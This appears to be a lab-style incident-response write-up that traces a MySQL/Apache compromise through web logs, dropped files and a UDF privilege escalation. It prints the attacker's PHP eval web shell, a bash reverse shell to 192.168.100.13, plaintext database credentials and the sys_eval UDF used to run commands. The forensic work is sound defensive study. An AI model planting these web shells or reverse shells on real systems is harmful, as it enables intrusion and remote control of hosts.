Chapter 2 Log Analysis - MySQL Incident Response


Step 1

root@xuanji:/var/log/apache2# cat access.log | awk '/.php/{print $7}'

I first looked at the web log and found a suspicious PHP file.

root@xuanji:/var/log/apache2# cat /var/www/html/sh.php 
<?php @eval($_POST['a']);?>
//ccfda79e-7aa1-4275-bc26-a6189eb9a20b
root@xuanji:/var/log/apache2#

Step 2

cat access.log | awk '/\?/{print $7}';

Check whether there is any suspicious parameter concatenation or the like.

root@xuanji:/var/log/apache2# cat /tmp/1.sh 
bash -i >&/dev/tcp/192.168.100.13/777 0>&1
root@xuanji:/var/log/apache2#

Steps 3 and 4

root@xuanji:/var/www/html# ls
Writenote.php adminer.php common.php css images index.php js log.php search.php sh.php tmpubzil.php tmputsrv.php tmpuvdzm.php
root@xuanji:/var/www/html# cat common.php
<?php
$conn=mysqli_connect("localhost","root","334cc35b3c704593","cms","3306");
if(!$conn){
echo "数据库连接失败";
}
root@xuanji:/var/www/html#

The database account and password are exposed in plain text; this may be a UDF privilege escalation.

root@xuanji:/# mysql -uroot -p334cc35b3c704593
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 4
Server version: 5.5.64-MariaDB-1ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show variables like "%secure_file_priv%";
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_file_priv | |
+------------------+-------+
1 row in set (0.00 sec)

MariaDB [(none)]>

That makes it even more certain: this is it. Next, check for the user-defined functions left behind by the UDF privilege escalation.

MariaDB [(none)]> select * from mysql.func;
+----------+-----+-------------+----------+
| name | ret | dl | type |
+----------+-----+-------------+----------+
| sys_eval | 0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set (0.00 sec)
MariaDB [(none)]> select sys_eval("whoami");              
+--------------------+
| sys_eval("whoami") |
+--------------------+
| mysql
|
+--------------------+
1 row in set (0.01 sec)

The functions run as the mysql user. A UDF privilege escalation normally has to drop a .so file, and it goes under /usr/lib/mysql/plugin.

root@xuanji:/usr/lib/mysql/plugin# ls
auth_pam.so dialog.so handlersocket.so mysqludf.so semisync_slave.so sphinx.so udf.so
auth_socket.so ha_innodb.so mysql_clear_password.so semisync_master.so server_audit.so sql_errlog.so

udf.so looks like the one.

root@xuanji:/usr/lib/mysql/plugin# echo  -n "/usr/lib/mysql/plugin/udf.so" | md5sum
b1818bde4e310f3d23f1005185b973e7 -